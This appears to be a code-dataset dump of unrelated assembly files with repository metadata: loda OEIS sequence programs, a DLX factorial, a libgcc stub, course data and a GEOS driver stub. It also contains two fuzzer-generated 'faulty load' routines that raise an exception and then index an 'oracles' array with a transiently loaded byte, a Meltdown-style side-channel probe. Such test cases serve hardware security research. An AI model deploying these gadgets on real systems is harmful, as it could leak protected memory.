movl $0x61626364, (%rdi)
nop
nop
nop
nop
nop
and $35392, %r14
lea addresses_A_ht+0x1c718, %rdi
clflush (%rdi)
nop
nop
cmp $59310, %r8
movw $0x6162, (%rdi)
nop
add %rsi, %rsi
lea addresses_A_ht+0x1b718, %rsi
lea addresses_normal_ht+0x1c7b8, %rdi
xor %rdx, %rdx
mov $71, %rcx
rep movsq
inc %rcx
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %r8
pop %r14
pop %r13
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r10
push %r12
push %r14
push %rax
push %rdi
push %rdx
push %rsi
// Store
lea addresses_WT+0x5c98, %r12
nop
nop
dec %rdi
movl $0x51525354, (%r12)
// Exception!!!
nop
nop
nop
nop
nop
mov (0), %r10
nop
nop
nop
nop
cmp $50147, %r10
// Faulty Load
lea addresses_A+0x16f18, %rdx
xor %rax, %rax
mov (%rdx), %si
lea oracles, %r10
and $0xff, %rsi
shlq $12, %rsi
mov (%r10,%rsi,1), %rsi
pop %rsi
pop %rdx
pop %rdi
pop %rax
pop %r14
pop %r12
pop %r10
ret
/*
<gen_faulty_load>
[REF]
{'src': {'NT': False, 'same': True, 'congruent': 0, 'type': 'addresses_A', 'AVXalign': False, 'size': 8}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 7, 'type': 'addresses_WT', 'AVXalign': False, 'size': 4}}
[Faulty Load]
{'src': {'NT': False, 'same': True, 'congruent': 0, 'type': 'addresses_A', 'AVXalign': False, 'size': 2}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'same': False, 'congruent': 4, 'type': 'addresses_WC_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 0, 'type': 'addresses_WC_ht'}}
{'src': {'same': True, 'congruent': 3, 'type': 'addresses_UC_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 3, 'type': 'addresses_A_ht'}}
{'src': {'same': False, 'congruent': 3, 'type': 'addresses_normal_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 6, 'type': 'addresses_WC_ht'}}
{'src': {'NT': False, 'same': True, 'congruent': 0, 'type': 'addresses_WC_ht', 'AVXalign': False, 'size': 16}, 'OP': 'LOAD'}
{'src': {'NT': False, 'same': False, 'congruent': 2, 'type': 'addresses_normal_ht', 'AVXalign': False, 'size': 8}, 'OP': 'LOAD'}
{'src': {'same': False, 'congruent': 9, 'type': 'addresses_UC_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 2, 'type': 'addresses_D_ht'}}
{'OP': 'STOR', 'dst': {'NT': True, 'same': False, 'congruent': 5, 'type': 'addresses_UC_ht', 'AVXalign': False, 'size': 4}}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 11, 'type': 'addresses_A_ht', 'AVXalign': False, 'size': 2}}
{'src': {'same': False, 'congruent': 10, 'type': 'addresses_A_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 5, 'type': 'addresses_normal_ht'}}
{'00': 21829}
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
*/
| 37.193182
| 2,999
| 0.659028
|
af453da2db900f299cc78d4ebc15043b0a6a61df
| 367
|
asm
|
Assembly
|
programs/oeis/307/A307989.asm
|
jmorken/loda
|
99c09d2641e858b074f6344a352d13bc55601571
|
[
"Apache-2.0"
] | 1
|
2021-03-15T11:38:20.000Z
|
2021-03-15T11:38:20.000Z
|
programs/oeis/307/A307989.asm
|
jmorken/loda
|
99c09d2641e858b074f6344a352d13bc55601571
|
[
"Apache-2.0"
] | null | null | null |
programs/oeis/307/A307989.asm
|
jmorken/loda
|
99c09d2641e858b074f6344a352d13bc55601571
|
[
"Apache-2.0"
] | null | null | null |
; A307989: a(n) = n - pi(2*n) + pi(n-1), where pi is the prime counting function.
; 0,0,1,2,3,4,4,6,6,6,7,8,9,11,11,11,12,14,14,16,16,16,17,18,19,20,20,21,22,23,23,25,26,26,27,27,27,29,30,30,31,32,33,35,35,36,37,39,39,40,40,40,41,42,42,43,43,44,45,47,48,50,51,51,52,52,53,55
mov $1,$0
cal $0,35250 ; Number of primes between n and 2n (inclusive).
sub $0,1
sub $1,$0
| 45.875
| 192
| 0.637602
|
d6628d0a20f50205f0adf5b9101d6a99a5956c4c
| 200
|
asm
|
Assembly
|
assembler/asm_example/advanced_asm_example/factorial/factorial_ds_ver02.asm
|
dpolad/dlx
|
8b4871a15f5bde91b8357ba01ca86cc2d8e04db9
|
[
"BSD-2-Clause"
] | 1
|
2017-09-28T22:49:02.000Z
|
2017-09-28T22:49:02.000Z
|
assembler/asm_example/advanced_asm_example/factorial/factorial_ds_ver02.asm
|
dpolad/dlx
|
8b4871a15f5bde91b8357ba01ca86cc2d8e04db9
|
[
"BSD-2-Clause"
] | null | null | null |
assembler/asm_example/advanced_asm_example/factorial/factorial_ds_ver02.asm
|
dpolad/dlx
|
8b4871a15f5bde91b8357ba01ca86cc2d8e04db9
|
[
"BSD-2-Clause"
] | null | null | null |
jal begin
nop
fact:
slei r3,r1,0
bnez r3,putone
nop
subi r17,r1,1
jal fact
nop
mult r1,r17,r1
j end
nop
putone:
addi r1,r0,1
end:
ret
nop
begin:
jal fact
addi r1,r0,4
nop
| 7.692308
| 15
| 0.625
|
d76905bdf16827c09bf8b5939d16e85097cdef0f
| 1,908
|
asm
|
Assembly
|
Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0xca_notsx.log_117_1410.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 9
|
2020-08-13T19:41:58.000Z
|
2022-03-30T12:22:51.000Z
|
Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0xca_notsx.log_117_1410.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 1
|
2021-04-29T06:29:35.000Z
|
2021-05-13T21:02:30.000Z
|
Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0xca_notsx.log_117_1410.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 3
|
2020-07-14T17:07:07.000Z
|
2022-03-21T01:12:22.000Z
|
.global s_prepare_buffers
s_prepare_buffers:
ret
.global s_faulty_load
s_faulty_load:
push %r13
push %r14
push %r15
push %r8
push %rax
push %rbx
push %rsi
// Store
lea addresses_WT+0x1f0af, %rsi
nop
sub %r13, %r13
mov $0x5152535455565758, %rax
movq %rax, %xmm0
vmovups %ymm0, (%rsi)
nop
nop
nop
add $38233, %r13
// Store
mov $0x6443e00000000157, %rsi
nop
nop
nop
xor %r15, %r15
mov $0x5152535455565758, %r14
movq %r14, %xmm5
vmovups %ymm5, (%rsi)
// Exception!!!
nop
nop
nop
nop
nop
mov (0), %rsi
nop
nop
inc %rsi
// Store
mov $0xcc7, %r14
nop
nop
inc %r8
movb $0x51, (%r14)
nop
nop
nop
cmp %rbx, %rbx
// Faulty Load
lea addresses_normal+0x16957, %r13
nop
add %rbx, %rbx
movups (%r13), %xmm2
vpextrq $0, %xmm2, %r8
lea oracles, %rbx
and $0xff, %r8
shlq $12, %r8
mov (%rbx,%r8,1), %r8
pop %rsi
pop %rbx
pop %rax
pop %r8
pop %r15
pop %r14
pop %r13
ret
/*
<gen_faulty_load>
[REF]
{'src': {'same': False, 'congruent': 0, 'NT': False, 'type': 'addresses_normal', 'size': 32, 'AVXalign': False}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 0, 'NT': False, 'type': 'addresses_WT', 'size': 32, 'AVXalign': False}}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 11, 'NT': False, 'type': 'addresses_NC', 'size': 32, 'AVXalign': False}}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 4, 'NT': True, 'type': 'addresses_P', 'size': 1, 'AVXalign': True}}
[Faulty Load]
{'src': {'same': True, 'congruent': 0, 'NT': False, 'type': 'addresses_normal', 'size': 16, 'AVXalign': False}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'34': 117}
34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34
*/
| 20.967033
| 350
| 0.645178
|
21d77028176ff5a3261b64cd8b4ddcc9be065a66
| 207
|
asm
|
Assembly
|
binutils-2.21.1/gcc-4.5.1/libgcc/config/ia64/_floatditf.asm
|
cberner12/xv6
|
53c4dfef0d48287ca0d0f9d27eab7a6ed7fee845
|
[
"MIT-0"
] | 51
|
2015-01-31T01:51:39.000Z
|
2022-02-18T02:01:50.000Z
|
binutils-2.21.1/gcc-4.5.1/libgcc/config/ia64/_floatditf.asm
|
cberner12/xv6
|
53c4dfef0d48287ca0d0f9d27eab7a6ed7fee845
|
[
"MIT-0"
] | 7
|
2017-05-29T09:29:00.000Z
|
2019-03-11T16:01:39.000Z
|
binutils-2.21.1/gcc-4.5.1/libgcc/config/ia64/_floatditf.asm
|
cberner12/xv6
|
53c4dfef0d48287ca0d0f9d27eab7a6ed7fee845
|
[
"MIT-0"
] | 12
|
2015-03-26T08:05:38.000Z
|
2022-02-18T02:01:51.000Z
|
#ifdef SHARED
#define __floattitf __floattitf_compat
#endif
#define L_floatditf
#include "config/ia64/lib1funcs.asm"
#ifdef SHARED
#undef __floattitf
.symver __floattitf_compat, __floattitf@GCC_3.0
#endif
| 17.25
| 47
| 0.821256
|
fba46ceaebc6e8702986d48bb9a91e9354a03f3b
| 1,442
|
asm
|
Assembly
|
programs/oeis/017/A017081.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 22
|
2018-02-06T19:19:31.000Z
|
2022-01-17T21:53:31.000Z
|
programs/oeis/017/A017081.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 41
|
2021-02-22T19:00:34.000Z
|
2021-08-28T10:47:47.000Z
|
programs/oeis/017/A017081.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 5
|
2021-02-24T21:14:16.000Z
|
2021-08-09T19:48:05.000Z
|
; A017081: a(n) = (8*n + 1)^5.
; 1,59049,1419857,9765625,39135393,115856201,282475249,601692057,1160290625,2073071593,3486784401,5584059449,8587340257,12762815625,18424351793,25937424601,35723051649,48261724457,64097340625,83841135993,108175616801,137858491849,173726604657,216699865625,267785184193,328080401001,398778220049,481170140857,576650390625,686719856393,812990017201,957186876249,1121154893057,1306860915625,1516398112593,1751989905401,2015993900449,2310905821257,2639363440625,3004150512793,3408200705601,3854601532649,4346598285457,4887597965625,5481173216993,6131066257801,6841192812849,7615646045657,8458700490625,9374815985193,10368641602001,11445019581049,12608989261857,13865791015625,15220870177393,16679880978201,18248690477249,19933382494057,21740261540625,23675856753593,25746925826401,27960458941449,30323682702257,32844064065625,35529314273793,38387392786601,41426511213649,44655137246457,48081998590625,51716086897993,55566661698801,59643254333849,63955671886657,68514001115625,73328612386193,78410163603001,83769604142049,89418178782857,95367431640625,101629210098393,108215668739201,115139273278249,122412804495057,130049362165625,138062368994593,146465574547401,155273059182449,164499237983257,174158864690625,184267035634793,194839193667601,205891132094649,217438998607457,229499299215625,242088902178993,255225041939801,268925323054849,283207724127657,298090601740625,313592694387193
mul $0,8
add $0,1
pow $0,5
| 206
| 1,382
| 0.907767
|
e8695d4202047c152913e0338deca42e72686792
| 702
|
asm
|
Assembly
|
oeis/024/A024907.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 11
|
2021-08-22T19:44:55.000Z
|
2022-03-20T16:47:57.000Z
|
oeis/024/A024907.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 9
|
2021-08-29T13:15:54.000Z
|
2022-03-09T19:52:31.000Z
|
oeis/024/A024907.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 3
|
2021-08-22T20:56:47.000Z
|
2021-09-29T06:26:12.000Z
|
; A024907: Numbers k such that 9*k - 7 is prime.
; Submitted by Christian Krause
; 1,2,4,6,10,12,16,20,22,26,30,32,36,40,44,50,52,54,64,66,72,74,76,92,94,96,102,104,106,110,114,122,124,130,132,136,144,146,152,160,162,166,170,174,180,186,192,202,206,212,220,226,230,232,234,240,246,250,256,260,262,270,272,274,276,282,284,292,296,300,302,304,312,314,316,324,326,330,334,344,362,370,374,380,384,386,394,396,400,412,414,430,432,436,444,446,454,460,472,474
mov $1,10
mov $2,$0
pow $2,2
lpb $2
sub $2,1
mov $3,$1
seq $3,10051 ; Characteristic function of primes: 1 if n is prime, else 0.
sub $0,$3
add $1,9
mov $4,$0
max $4,1
cmp $4,$0
mul $2,$4
lpe
mov $0,$1
sub $0,10
div $0,9
add $0,1
| 30.521739
| 371
| 0.666667
|
1a365e4e6f6803a67bfca132451a9a8444530fbe
| 552
|
asm
|
Assembly
|
mp3/extra.asm
|
Candy-Crusher/ece220
|
18001a82a46711b0451d37b3dd2c747f85abad69
|
[
"MIT"
] | null | null | null |
mp3/extra.asm
|
Candy-Crusher/ece220
|
18001a82a46711b0451d37b3dd2c747f85abad69
|
[
"MIT"
] | 1
|
2021-04-26T10:50:25.000Z
|
2021-04-26T10:50:25.000Z
|
mp3/extra.asm
|
Candy-Crusher/ece220
|
18001a82a46711b0451d37b3dd2c747f85abad69
|
[
"MIT"
] | null | null | null |
.ORIG x4800
.FILL x15 ; M W F
.FILL NAME1 ; "A"
.FILL x0290 ; 10, 13, 15
.FILL x01 ; F
.FILL NAME2 ; "B"
.FILL x8114 ; 8, 10, 14
.FILL x1F ; M Tu W Th F
.FILL NAME3 ; "C"
.FILL x0424 ; 8, 11, 16
.FILL x0B ; Tu Th F
.FILL NAME4 ; "D"
.FILL x0128 ; 9, 11, 14
.FILL x1C ; M Tu W
.FILL NAME5 ; "E"
.FILL x8A08 ; 9, 15, 17
.FILL x12 ; M Th
.FILL NAME6 ; "F"
.FILL x8C80 ; 13, 16, 17
.FILL #-1 ; end of list
NAME1 .STRINGZ "A"
NAME2 .STRINGZ "B"
NAME3 .STRINGZ "C"
NAME4 .STRINGZ "D"
NAME5 .STRINGZ "E"
NAME6 .STRINGZ "F"
.END
| 14.526316
| 25
| 0.570652
|
1df5d05a0cdcceaf8d393bb537f750d8a94090d1
| 594
|
asm
|
Assembly
|
oeis/158/A158679.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 11
|
2021-08-22T19:44:55.000Z
|
2022-03-20T16:47:57.000Z
|
oeis/158/A158679.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 9
|
2021-08-29T13:15:54.000Z
|
2022-03-09T19:52:31.000Z
|
oeis/158/A158679.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 3
|
2021-08-22T20:56:47.000Z
|
2021-09-29T06:26:12.000Z
|
; A158679: a(n) = 961*n^2 - 31.
; 930,3813,8618,15345,23994,34565,47058,61473,77810,96069,116250,138353,162378,188325,216194,245985,277698,311333,346890,384369,423770,465093,508338,553505,600594,649605,700538,753393,808170,864869,923490,984033,1046498,1110885,1177194,1245425,1315578,1387653,1461650,1537569,1615410,1695173,1776858,1860465,1945994,2033445,2122818,2214113,2307330,2402469,2499530,2598513,2699418,2802245,2906994,3013665,3122258,3232773,3345210,3459569,3575850,3694053,3814178,3936225,4060194,4186085,4313898,4443633
mov $1,2
add $1,$0
mul $1,$0
mul $1,961
add $1,930
mov $0,$1
| 59.4
| 499
| 0.808081
|
c6fef99477036b7bfcc9f62efb17edb432cd4af5
| 3,276
|
asm
|
Assembly
|
Driver/Net/Standalone/standaloneUser.asm
|
steakknife/pcgeos
|
95edd7fad36df400aba9bab1d56e154fc126044a
|
[
"Apache-2.0"
] | 504
|
2018-11-18T03:35:53.000Z
|
2022-03-29T01:02:51.000Z
|
Driver/Net/Standalone/standaloneUser.asm
|
steakknife/pcgeos
|
95edd7fad36df400aba9bab1d56e154fc126044a
|
[
"Apache-2.0"
] | 96
|
2018-11-19T21:06:50.000Z
|
2022-03-06T10:26:48.000Z
|
Driver/Net/Standalone/standaloneUser.asm
|
steakknife/pcgeos
|
95edd7fad36df400aba9bab1d56e154fc126044a
|
[
"Apache-2.0"
] | 73
|
2018-11-19T20:46:53.000Z
|
2022-03-29T00:59:26.000Z
|
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Copyright (c) GeoWorks 1992 -- All Rights Reserved
PROJECT: PC GEOS
MODULE:
FILE: standaloneUser.asm
AUTHOR: Chris Boyke
ROUTINES:
Name Description
---- -----------
REVISION HISTORY:
Name Date Description
---- ---- -----------
chrisb 12/20/92 Initial version.
DESCRIPTION:
$Id: standaloneUser.asm,v 1.1 97/04/18 11:48:50 newdeal Exp $
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
StandaloneUserFunction
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Handle the DR_NET_USER_FUNCTION ops
CALLED BY: StandaloneStrategy
PASS: al - NetUserFunction
RETURN: see netDr.def
DESTROYED: di
PSEUDO CODE/STRATEGY:
This procedure is a fixed-code stub -- the real proc is
StandaloneUserRealFunction
KNOWN BUGS/SIDE EFFECTS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
chrisb 10/16/92 Initial version.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
StandaloneResidentCode segment resource
StandaloneUserFunction proc near
call StandaloneUserRealFunction
ret
StandaloneUserFunction endp
StandaloneResidentCode ends
StandaloneCommonCode segment resource
StandaloneUserRealFunction proc far
.enter
clr ah
mov di, ax
call cs:[netUserFunctionTable][di]
.leave
ret
StandaloneUserRealFunction endp
netUserFunctionTable nptr.near \
StandaloneUserStub, ; GET LOGIN
StandaloneUserGetFullName, ; GET_FULL
StandaloneUserStub, ; ENUM_CONNECTED_USERS
StandaloneUserStub, ; VERIFY_PASSWORD
StandaloneUserStub, ; GET_CONNECTION_NUMBER
StandaloneUserStub, ; CHECK_IF_IN_GROUP
StandaloneUserStub ; ENUM_USERS
.assert ($-netUserFunctionTable eq NetUserFunction)
COMMENT @----------------------------------------------------------------------
FUNCTION: StandaloneGetUserFullName
DESCRIPTION: copy the login name to the full name
PASS: ds:si - fptr to users login name
cx:dx - buffer to fill in with real name
RETURN: buffer filled in
DESTROYED: ax, bx
PSEUDO CODE/STRATEGY:
REVISION HISTORY:
Name Date Description
---- ---- -----------
chrisb 11/92 initial version
------------------------------------------------------------------------------@
StandaloneUserGetFullName proc near
uses ax,cx
.enter
mov es, cx
mov di, dx
startLoop:
lodsb
stosb
tst al
jnz startLoop
.leave
ret
StandaloneUserGetFullName endp
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
StandaloneUserStub
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS:
CALLED BY:
PASS:
RETURN: nothing
DESTROYED: nothing
PSEUDO CODE/STRATEGY:
KNOWN BUGS/SIDE EFFECTS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
chrisb 12/20/92 Initial version.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
StandaloneUserStub proc near
ret
StandaloneUserStub endp
StandaloneCommonCode ends
| 20.603774
| 80
| 0.547314
|
6987d7646c999698ff4d059c1313dfa5207a9a61
| 321
|
asm
|
Assembly
|
asm/fizz/itoa.asm
|
tekktonic/programming
|
139959ab9934912d4c531e5ee8b1f39094a6823c
|
[
"0BSD"
] | null | null | null |
asm/fizz/itoa.asm
|
tekktonic/programming
|
139959ab9934912d4c531e5ee8b1f39094a6823c
|
[
"0BSD"
] | null | null | null |
asm/fizz/itoa.asm
|
tekktonic/programming
|
139959ab9934912d4c531e5ee8b1f39094a6823c
|
[
"0BSD"
] | null | null | null |
section .text
global _start
global _main
main:
_start:
itoa:
mov eax, 1234
mov ebx, 0
mov ecx, $0A
div ecx
add edx, $30
mov [scratch+ebx], edx
add ebx, 1
mov [scratch+ebx], byte 0
mov eax, 4
mov ebx, 1
mov ecx, scratch
mov edx, 2
int 0x80
mov eax, 1
mov ebx, 0
int 0x80
section .bss
scratch resb 5
| 12.346154
| 26
| 0.660436
|
211be01996f5f9797733dff43d6024099beea7c2
| 585
|
asm
|
Assembly
|
oeis/298/A298078.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 11
|
2021-08-22T19:44:55.000Z
|
2022-03-20T16:47:57.000Z
|
oeis/298/A298078.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 9
|
2021-08-29T13:15:54.000Z
|
2022-03-09T19:52:31.000Z
|
oeis/298/A298078.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 3
|
2021-08-22T20:56:47.000Z
|
2021-09-29T06:26:12.000Z
|
; A298078: a(n) = 7*n^2 - 7*n - 43.
; -43,-29,-1,41,97,167,251,349,461,587,727,881,1049,1231,1427,1637,1861,2099,2351,2617,2897,3191,3499,3821,4157,4507,4871,5249,5641,6047,6467,6901,7349,7811,8287,8777,9281,9799,10331,10877,11437,12011,12599,13201,13817,14447,15091,15749,16421,17107,17807,18521,19249,19991,20747,21517,22301,23099,23911,24737,25577,26431,27299,28181,29077,29987,30911,31849,32801,33767,34747,35741,36749,37771,38807,39857,40921,41999,43091,44197,45317,46451,47599,48761,49937,51127,52331,53549,54781,56027,57287,58561
add $0,1
bin $0,2
sub $0,6
mul $0,14
add $0,41
| 65
| 500
| 0.764103
|
20e3b40c1a1ebf7173a21a961cf4aa5e53486145
| 281
|
asm
|
Assembly
|
ADL/Assemble/Insert/0/SHR_insert_head.asm
|
MaxMorning/LinkedListVisualization
|
b2a4f8f11ff6f6dfb495566a006e3472f1dac369
|
[
"Apache-2.0"
] | 3
|
2021-11-06T03:47:08.000Z
|
2021-11-06T03:47:11.000Z
|
ADL/Assemble/Insert/0/SHR_insert_head.asm
|
MaxMorning/LinkedListVisualization
|
b2a4f8f11ff6f6dfb495566a006e3472f1dac369
|
[
"Apache-2.0"
] | null | null | null |
ADL/Assemble/Insert/0/SHR_insert_head.asm
|
MaxMorning/LinkedListVisualization
|
b2a4f8f11ff6f6dfb495566a006e3472f1dac369
|
[
"Apache-2.0"
] | 1
|
2021-11-06T03:47:14.000Z
|
2021-11-06T03:47:14.000Z
|
aLine 0
nNew newNodePtr, {0:D}
gNewVPtr temp
gMoveNext temp, Root
aLine 1
gBne temp, null, 3
aLine 2
gMove Rear, newNodePtr
aLine 4
nMoveAbs newNodePtr, 1380, 435.455
pSetNext newNodePtr, temp
aLine 5
pSetNext Root, newNodePtr
aLine 6
aStd
gDelete newNodePtr
gDelete temp
Halt
| 12.217391
| 34
| 0.786477
|
85b7908474dfb249c26144f7c7af03ebc89e49c3
| 629
|
asm
|
Assembly
|
oeis/010/A010792.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 11
|
2021-08-22T19:44:55.000Z
|
2022-03-20T16:47:57.000Z
|
oeis/010/A010792.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 9
|
2021-08-29T13:15:54.000Z
|
2022-03-09T19:52:31.000Z
|
oeis/010/A010792.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 3
|
2021-08-22T20:56:47.000Z
|
2021-09-29T06:26:12.000Z
|
; A010792: a(n) = n!*(n+3)! / 3!.
; Submitted by Jon Maiga
; 1,4,40,720,20160,806400,43545600,3048192000,268240896000,28970016768000,3766102179840000,579979735695360000,104396352425164800000,21714441304434278400000,5168037030455358259200000,1395369998222946729984000000,424192479459775805915136000000,144225443016323774011146240000000,54517217460170386576213278720000000,22788196898351221588857150504960000000,10482570573241561930874289232281600000000,5283215568913747213160641773069926400000000,2905768562902560967238352975188459520000000000
mov $1,1
mov $2,3
lpb $0
mul $1,$0
sub $0,1
add $2,1
mul $1,$2
lpe
mov $0,$1
| 44.928571
| 483
| 0.847377
|
3e012292d919d25cc5e7d053940723c3c0f67b31
| 241
|
asm
|
Assembly
|
libsrc/_DEVELOPMENT/arch/sms/vram/c/sccz80/sms_set_vram_callee.asm
|
